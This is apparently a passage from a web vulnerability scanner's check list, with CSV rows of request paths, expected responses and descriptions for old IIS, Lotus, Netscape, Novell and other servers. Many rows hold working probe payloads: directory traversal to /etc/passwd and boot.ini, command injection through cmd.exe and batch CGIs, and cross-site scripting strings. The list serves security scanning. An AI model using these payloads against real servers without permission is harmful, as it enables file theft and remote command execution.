c,iis,/scripts/,tools/newdsn.exe,200,GET,"This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. BID-1818."
c,iis,/scripts/Carello/,Carello.dll,200,GET,"Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto."
c,iis,/scripts/iisadmin/,bdir.htr,200,GET,"This default script shows host info and may allow file browsing,request /scripts/iisadmin/bdir.htr??c:\<dirs>"
c,iis,/scripts/samples/search/,author.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be  removed."
c,iis,/scripts/samples/search/,filesize.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be  removed."
c,iis,/scripts/samples/search/,filetime.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be  removed."
c,iis,/scripts/samples/search/,queryhit.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be  removed."
c,iis,/scripts/samples/search/,simple.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be  removed."
c,iis,/scripts/tools/,ctss.idc,200,GET,"This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more."
c,iis,/scripts/tools/,dsnform,200,GET,"An oldie but goodie... allows creation of ODBC Data Source"
c,iis,/scripts/tools/,dsnform.exe,200,GET,"An oldie but goodie... allows creation of ODBC Data Source"
c,iis,/search/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/search/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/search/htx/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/search/htx/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/servlet/,com.newatlanta.servletexec.JSP10Servlet/,"The file was not found",GET,"ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS discloses the web root. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp"
c,iis,/servlet/,com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa,"OBJECT RUNAT=Server",GET,"ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS can reveal source code. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp"
c,iis,/Sites/Knowledge/Membership/Inspired/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine."
c,iis,/Sites/Knowledge/Membership/Inspiredtutorial/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine."
c,iis,/Sites/Samples/Knowledge/Membership/Inspired/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine."
c,iis,/Sites/Samples/Knowledge/Membership/Inspiredtutorial/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine."
c,iis,/Sites/Samples/Knowledge/Push/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine."
c,iis,/Sites/Samples/Knowledge/Search/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine."
c,iis,/SiteServer/admin/,findvserver.asp,200,GET,"Gives a list of installed Site Server components"
c,iis,/SiteServer/Admin/commerce/foundation/,domain.asp,200,GET,"Displays known domains of which that server is involved."
c,iis,/SiteServer/Admin/commerce/foundation/,driver.asp,200,GET,"Displays a list of installed ODBC drivers."
c,iis,/SiteServer/Admin/commerce/foundation/,DSN.asp,200,GET,"Displays all DSNs configured for selected ODBC drivers." 
c,iis,/SiteServer/Admin/knowledge/dsmgr/,default.asp,200,GET,"USed to view current search catalog configurations"
c,iis,/SiteServer/Admin/knowledge/dsmgr/users/,GroupManager.asp,200,GET,"Used to create, modify, and potentially delete LDAP users and groups."
c,iis,/SiteServer/Admin/knowledge/dsmgr/users/,UserManager.asp,200,GET,"Used to create, modify, and potentially delete LDAP users and groups."
c,iis,/SiteServer/Admin/knowledge/persmbr/,vs.asp,200,GET,"Expose various LDAP service and backend configuration parameters"
c,iis,/SiteServer/Admin/knowledge/persmbr/,VsLsLpRd.asp,200,GET,"Expose various LDAP service and backend configuration parameters"
c,iis,/SiteServer/Admin/knowledge/persmbr/,VsPrAuoEd.asp,200,GET,"Expose various LDAP service and backend configuration parameters"
c,iis,/SiteServer/Admin/knowledge/persmbr/,VsTmPr.asp,200,GET,"Expose various LDAP service and backend configuration parameters"
c,iis,/SiteServer/Knowledge/,Default.asp?ctr=\"><script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"Site Server is vulnerable to Cross Site Scripting"
c,iis,/SiteServer/Publishing/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine."
c,iis,/siteserver/publishing/,viewcode.asp?source=/default.asp,200,GET,"May be able to view source code using Site Server vulnerability."
c,iis,/ssi/,envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to read files from the server."
c,iis,/vc30,/,200,GET,"Site Server sample files.  This might be interresting."
c,iis,/_mem_bin,/,200,GET,"This might be interresting - User Login"
c,iis,/_mem_bin/,auoconfig.asp,200,GET,"Displays the default AUO (LDAP) schema, including host and port."
c,iis,/_mem_bin/,FormsLogin.asp,200,GET,"This might be interresting - User Login"
c,iis,/_mem_bin/,formslogin.asp?\"><script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"Site Server is vulnerable to Cross Site Scripting"
c,iis,/_mem_bin/,remind.asp,200,GET,"Page will give the password reminder for any user requested (username must be known)."
c,iis,/_vti_pvt/,linkinfo.cnf,200,GET,"IIS file shows http links on and off site. Might show host trust relationships and other machines on network."
c,iis,@CGIDIRS,"tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to execute arbitrary commands on the server."
c,iis,@CGIDIRS,/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,iis,@CGIDIRS,/_vti_pvt/doctodep.btr,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,iis,@CGIDIRS,cfgwiz.exe,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,iis,@CGIDIRS,Cgitest.exe,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,iis,@CGIDIRS,cmd.exe?/c+dir,200,GET,"cmd.exe can execute arbitrary commands"
c,iis,@CGIDIRS,cmd1.exe?/c+dir,200,GET,"cmd1.exe can execute arbitrary commands"
c,iis,@CGIDIRS,fpsrvadm.exe,200,GET,"Potentially vulnerable CGI program."
c,iis,@CGIDIRS,hello.bat?&dir+c:\,200,GET,"This batch file may allow attackers to execute remote commands."
c,iis,@CGIDIRS,input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to read files from the server."
c,iis,@CGIDIRS,input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to read files from the server."
c,iis,@CGIDIRS,mailform.exe,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,iis,@CGIDIRS,ms_proxy_auth_query/,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,iis,@CGIDIRS,post16.exe,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,iis,@CGIDIRS,post32.exe|dir%20c:\,200,GET,"post32 can execute arbitrary commands"
c,iis,@CGIDIRS,sensepost.exe?/c+dir,200,GET,"The presence of sensepost.exe indicates the system is/was vulnerable to a Unicode flaw and was compromised with a test script from SensePost. The sensepost.exe allows command execution (it is a copy of cmd.exe), as did the original unicode exploit (see http://www.securitybugware.org/NT/1422.html). CVE-2000-0884."
c,iis,@CGIDIRS,shtml.ddl,200,GET,"This may allow attackers to retrieve document source."
c,iis,@CGIDIRS,SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3,"boot.ini",GET,"Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade."
c,iis,@CGIDIRS,stats/statsbrowse.asp?filepath=c:\&Opt=3,"boot.ini",GET,"Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade."
c,iis,@CGIDIRS,test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to read files from the server."
c,jrun,/,./,"Index of ",GET,"Appending '/./' to a directory allows indexing"
c,lotus,/,?OpenServer,"\/icons\/abook\.gif",GET,"This install allows remote users to enumerate DB names, see http://www.securiteam.com/securitynews/6W0030U35W.html"
c,lotus,/,agentrunner.nsf,200,GET,"This database can be read without authentication."
c,lotus,/,bookmark.nsf,200,GET,"This database can be read without authentication."
c,lotus,/,catalog.nsf,200,GET,"A list of server databases can be retrieved, as well as a list of ACLs."
c,lotus,/,cersvr.nsf,200,GET,"Server certificate data can be accessed remotely."
c,lotus,/,collect4.nsf,200,GET,"This database can be read without authentication."
c,lotus,/,database.nsf,200,GET,"This database can be read without authentication, see http://www.perfectotech.com/blackwatchlabs/ for other exploits and details."
c,lotus,/,domcfg.nsf,200,GET,"This database can be read without authentication."
c,lotus,/,domlog.nsf,200,GET,"The domain server logs can be accessed remotely."
c,lotus,/,events4.nsf,200,GET,"The events log can be accessed remotely."
c,lotus,/,log.nsf,200,GET,"The server log is remotely accessible."
c,lotus,/,mab.nsf,200,GET,"This database can be read without authentication."
c,lotus,/,mail.box,200,GET,"The mail database can be read without authentication."
c,lotus,/,mailw46.nsf,200,GET,"This database can be read without authentication."
c,lotus,/,names.nsf,200,GET,"User names and groups can be accessed remotely (possibly password hashes a well)"
c,lotus,/,ntsync4.nsf,200,GET,"This database can be read without authentication."
c,lotus,/,open?,200,GET,"The Lotus server allows directory browsing by putting ?open after a directory name."
c,lotus,/,setup.nsf,200,GET,"The server can be configured remotely, or current setup can be downloaded."
c,lotus,/,statrep.nsf,200,GET,"Any reports generated by the admins can be retrieved."
c,lotus,/,today.nsf,200,GET,"This database can be read without authentication."
c,lotus,/,webadmin.nsf,200,GET,"The server admin database can be accessed remotely."
c,lotus,/cgi-bin/,testing_whatever,"domino/cgi-bin",GET,"The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI."
c,lotus,@CGIDIRS,com5..........................................................................................................................................................................................................................box,"Execution of Perl script",GET,"Lotus reveals file system paths when requesting DOS devices with bad syntax."
c,lotus,@CGIDIRS,com5.java,"Execution of",GET,"Lotus reveals file system paths when requesting DOS devices with bad syntax."
c,lotus,@CGIDIRS,com5.pl,"Execution of Perl script",GET,"Lotus reveals file system paths when requesting DOS devices with bad syntax."
c,mipcd,/,LOGIN.PWD,200,GET,"MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled."
c,mipcd,/USER/,CONFIG.AP,200,GET,"MIPCD configuration information. MIPCD should not have the web interface enabled."
c,mycio,/,.../.../.../,"Last Modified",GET,"The myCIO server allows directory traversal."
c,mywebserver,/,JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--,"<script>alert('Vulnerable')</script>",GET,"MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,mywebserver,/,JUNK(223)<font%20size=50>DEFACED<!--//--,"DEFACED",GET,"MyWebServer 1.0.2 is vulnerable to HTML injection. Upgrade to a later version."
c,mywebserver,/MWS/,HandleSearch.html?searchTarget=test&B1=Submit,200,GET,"MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server."
c,ncsa,@CGIDIRS,archie,200,GET,"Gateway to the unix command, may be able to submit extra commands"
c,ncsa,@CGIDIRS,calendar,200,GET,"Gateway to the unix command, may be able to submit extra commands"
c,ncsa,@CGIDIRS,calendar.pl,200,GET,"Gateway to the unix command, may be able to submit extra command...yet another check"
c,ncsa,@CGIDIRS,date,200,GET,"Gateway to the unix command, may be able to submit extra commands"
c,ncsa,@CGIDIRS,finger,200,GET,"Gateway to the unix command, may be able to submit extra commands"
c,ncsa,@CGIDIRS,fortune,200,GET,"Gateway to the unix command, may be able to submit extra commands"
c,ncsa,@CGIDIRS,jj,200,GET,"Allows attackers to execute commands as http daemon"
c,ncsa,@CGIDIRS,mail,200,GET,"Simple PERL mailing script to send form data to a pre-configured email address"
c,ncsa,@CGIDIRS,nph-error.pl,200,GET,"Gives more information in error messages"
c,ncsa,@CGIDIRS,post-query,200,POST,"Echoes back result of your POST"
c,ncsa,@CGIDIRS,query,200,GET,"Echoes back result of your GET"
c,ncsa,@CGIDIRS,redirect,200,GET,"Redirects via URL from form"
c,ncsa,@CGIDIRS,test-cgi.tcl,200,GET,"May echo environment variables or give directory listings"
c,ncsa,@CGIDIRS,test-env,200,GET,"May echo environment variables or give directory listings"
c,ncsa,@CGIDIRS,uptime,200,GET,"Gateway to the unix command, may be able to submit extra commands"
c,ncsa,@CGIDIRS,wais.pl,200,GET,"Gateway to the unix command, may be able to submit extra commands"
c,netscape,/,,"Index of ",get,"Fasttrack can give a directory listing if issued 'get' instead of 'GET'."
c,netscape,/,,"Index of ",INDEX,"Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher."
c,netscape,/,.nsconfig,200,GET,"Contains authorization information"
c,netscape,/,.perf,200,GET,"Contains server performance information"
c,netscape,/,?PageServices,"Index of ",GET,"Server allows directory indexing with ?PageServices"
c,netscape,/,?wp-cs-dump,"Index of ",GET,"The remote server may allow directory listings through Web Publisher. Web Publisher should be disabled."
c,netscape,/,nethome/,200,GET,"Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page."
c,netscape,/,publisher/,200,GET,"Netscape Publisher. May have ability to edit files on the server. May be able to list arbitrary directories via GET request. CVE-2000-0237"
c,netscape,/,search,"search-ui/applet",GET,"Netscape search for iPlanet versions 4.1 lower than SP 10 and iPlanet 6 lower than SP 3 are vulnerable to a buffer overflow. Search is enabled on this server but the BO could not be confirmed."
c,netscape,/,search?NS-query-pat=../../../../../../../../../../etc/passwd,"root:",GET,"The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+"
c,netscape,/,search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini,"boot loader",GET,"The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+"
c,netscape,/admin-serv/config/,admpw,200,GET,"This file contains the encrypted Netscape admin password. It should not be accessible via the web."
c,netscape,/help/,contents.htm,200,GET,"Default Netscape manual found. All default pages should be removed."
c,netscape,/help/,home.html,200,GET,"Default Netscape manual found. All default pages should be removed."
c,netscape,/manual/ag/,esperfrm.htm,200,GET,"Default Netscape manual found. All default pages should be removed."
c,netscape,/mc-icons,/,"Index of",GET,"Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed."
c,netscape,/ns-icons,/,"Index of",GET,"Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed."
c,netscape,/PSUser/,PSCOErrPage.htm?errPagePath=/etc/passwd,"root:",GET,"This default Netscape file allows an attacker to read arbitrary files on the host. It should be removed."
c,netscape,/_vti_pvt,/administrators.pwd,200,GET,"these contain passwords encrypted with unix crypt()"
c,netscape,/_vti_pvt,/authors.pwd,200,GET,"these contain passwords encrypted with unix crypt()"
c,netscape,/_vti_pvt,/users.pwd,200,GET,"these contain passwords encrypted with unix crypt()"
c,netscape,@CGIDIRS,.nsconfig,200,GET,"Contains authorization information"
c,novell,/cgi-bin/,GW5/GWWEB.EXE,200,GET,"Groupwise web interface"
c,novell,/cgi-bin/GW5/,GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA,"SYS:",GET,"Some Netware web servers reveal the system path to files when unexpected arguments are sent to CGI."
c,novell,/lcgi/,sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf,"SET CLIENT FILE",GET,"Default scripts can allow arbitrary access to the host."
c,novell,/lcgi/,sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse,"SERVER_SOFTWARE",GET,"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed."
c,novell,/lcgi/,sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../../../../../system/autexec.ncf,200,GET,"Novell web server allows any file on the system to viewed through the viewcode.jsp file"
c,novell,/lcgi/,sys:/novonyx/suitespot/docs/sewse/misc/test.jse,"SCRIPT_NAME",GET,"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed."
c,novell,/netbasic/,websinfo.bas,"Company",GET,"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed."
c,novell,/perl/,-e%20print%20Hello,200,GET,"The PERL interpreter on the novell system may allow any command to be executed."
c,novell,/perl/,files.pl,200,GET,"This might be interesting..."
c,novell,/perl/samples/,env.pl,"HSERVER_SOFTWARE",GET,"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed."
c,novell,/perl/samples/,lancgi.pl,"Lan Boards",GET,"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed."
c,novell,/perl/samples/,ndslogin.pl,"Fullname",GET,"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed."
c,novell,/perl/samples/,volscgi.pl,"Size",GET,"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed."
c,novell,/perl5/,files.pl,200,GET,"This might be interesting..."
c,novell,/scripts/,convert.bas,200,GET,"This might be interesting..."
c,novell,/scripts/,GW5/GWWEB.EXE,200,GET,"Groupwise web interface"
c,novell,/servlet/,webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00,"[boot loader]",GET,"The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server."
c,novell,/servlet/,webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server."
c,novell,@CGIDIRS,GW5/GWWEB.EXE?HELP=somewhereovertherainbow,200,GET,"The Gwweb.exe program can allow attackers to view arbitrary files on the server."
c,omnihttpd,/,test.php%20,"<?",GET,"The OmniHTTP install may allow php/shtml/pl script disclosure.  Upgrade to the latest version."
c,omnihttpd,/,test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x,"<SCRIPT>alert('Vulnerable')</SCRIPT>",GET,"OmniHTTPD's test.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,omnihttpd,/,test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x,"<SCRIPT>alert('Vulnerable')</SCRIPT>",GET,"OmniHTTPD's test.shtml is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,omnihttpd,@CGIDIRS,redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E,"<script>alert('Vulnerable')</script>",GET,"OmniHTTPD's redir.exe is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,oracle,/,owa_util%2esignature,200,GET,""
c,sambar,/cgi-win/,cgitest.exe,200,GET,"This CGI may allow the server to be crashed remotely, see http://www.securityoffice.net/ for details.  Remove this default CGI."
c,savant,@CGIDIRS,cgitest.exe,200,GET,"This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header."
c,simpleserver,/cgi-bin/,%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1,"Reply from 127.0.0.1",GET,"Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011."
c,simpleserver,/cgi-bin/,%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1",200,GET,"Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011."
c,tivoli,/,signon,"Administrator Login",GET,"Tivoli administrator login found. Test the default login of admin/admin.  Tivoli allows system administration."
c,w4,/cgi-bin/,cgi-test.exe,200,GET,""
c,weblogic,/,%00/,"Index of",GET,"Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher."
c,weblogic,/,%2e/,"<%",GET,"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher."
c,weblogic,/,%2f/,"<%",GET,"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher."
c,weblogic,/,%5c/,"<%",GET,"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher."
c,weblogic,@CGIDIRS,index.js0x70,"\<\%\=",GET,"The Weblogic can be tricked into revealing jsp source by adding '0x70' to end of the URL."
c,webserver4d,/,%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd,"root:",GET,"The Web_Server_4D is vulnerable to a directory traversal problem."
c,webserver4d,/,%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini,"boot loader",GET,"The Web_Server_4D is vulnerable to a directory traversal problem."
c,website,/,%a%s%p%d,"*s?d",GET,"Format bug is present & may reveal system path, upgrade to the latest version."
c,website,/,index.html%20,"File for URL",GET,"Website may reveal file system paths by adding %20 to the end of a legitimate .html request."
c,website,/,sam,200,GET,"This might be interesting..."
c,website,/,sam.bin,200,GET,"This might be interesting..."
c,website,/,sam._,200,GET,"This might be interesting..."
c,website,/cgi-dos/,args.bat,200,GET,"This might be interesting..."
c,website,/cgi-shl/,win-c-sample.exe,200,GET,"win-c-sample.exe has a buffer overflow"
c,website,@CGIDIRS,"webfind.exe?keywords=01234567890123456789",500,GET,"May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater"